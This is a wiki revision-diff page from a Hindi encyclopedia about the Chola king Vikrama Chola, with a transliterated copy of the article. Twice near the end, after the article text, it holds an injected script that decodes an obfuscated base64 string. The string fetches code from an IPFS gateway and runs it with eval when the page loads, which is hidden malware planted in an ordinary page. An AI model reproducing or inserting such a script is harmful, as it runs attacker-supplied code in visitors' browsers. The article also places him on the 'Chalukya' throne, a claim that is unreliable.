Difference between revisions of "विक्रम चोल"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('विक्रम चोल (1120-1133 ई.) कुलोत्तंग की मृत्यु के बाद उसका पु...' के साथ नया पन्ना बनाया)
 
Line 1: Line 1:
विक्रम चोल (1120-1133 ई.)
+
*[[कुलोत्तुंग प्रथम]] की मृत्यु के बाद उसका पुत्र '''विक्रम चोल''' (1120-1133 ई.) [[चालुक्य साम्राज्य]] के राजसिंहासन पर आसीन हुआ।
कुलोत्तंग की मृत्यु के बाद उसका पुत्र विक्रम चोल चालुक्य राजसिंहासन पर बैठा। विक्रमादित्य षष्ठ के मरने के उसने पुनः वेंगी पर अधिकार कर लिया। 1133 के लगभग उसने पश्चिमी चालुक्य नरेश सोमेश्वर तृतीय को पराजित किया। वह अपने पिता की नतियों एवं आदर्शो के प्रतिकूल था। वह धार्मिक दृष्टि से असहिष्णु था। उसने चिदंबरम् के नटराज मंदिर को अपार दान दिया। उसने ‘अकलक’ एवं ‘त्याग समुद्र’ की उपाधियां धारण की।
+
*[[विक्रमादित्य षष्ठ]] के मरने के बाद उसने पुनः वेंगी पर पुन: अधिकार कर लिया।
 +
*1133 ई. के लगभग उसने पश्चिमी चालुक्य नरेश [[सोमेश्वर तृतीय]] को पराजित किया।
 +
*वह अपने [[पिता]] की नतियों एवं आदर्शों के बिल्कुल प्रतिकूल प्रवृत्ति का था।
 +
*वह धार्मिक दृष्टि से एक असहिष्णु प्रवृत्ति का व्यक्ति था।
 +
*विक्रम चोल ने चिदंबरम् के नटराज मंदिर को अपार दान दिया था।
 +
*उसने ‘अकलक’ एवं ‘त्याग समुद्र’ की उपाधियाँ धारण की थीं।
  
 
{{प्रचार}}
 
{{प्रचार}}
Line 10: Line 15:
 
|शोध=
 
|शोध=
 
}}
 
}}
==टीका टिप्पणी और संदर्भ==
+
 
<references/>
+
==संबंधित लेख==
[[Category:नया पन्ना]]
+
{{चोल राजवंश}}
 +
{{भारत के राजवंश}}
 +
[[Category:इतिहास_कोश]]
 +
[[Category:चोल साम्राज्य]]
 
__INDEX__
 
__INDEX__

Revision as of 10:41, 18 February 2011

  • kulottuang pratham ki mrityu ke bad usaka putr vikram chol (1120-1133 ee.) chaluky samrajy ke rajasianhasan par asin hua.
  • vikramadity shashth ke marane ke bad usane punah veangi par pun: adhikar kar liya.
  • 1133 ee. ke lagabhag usane pashchimi chaluky naresh someshvar tritiy ko parajit kiya.
  • vah apane pita ki natiyoan evan adarshoan ke bilkul pratikool pravritti ka tha.
  • vah dharmik drishti se ek asahishnu pravritti ka vyakti tha.
  • vikram chol ne chidanbaramh ke nataraj mandir ko apar dan diya tha.
  • usane ‘akalak’ evan ‘tyag samudr’ ki upadhiyaan dharan ki thian.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>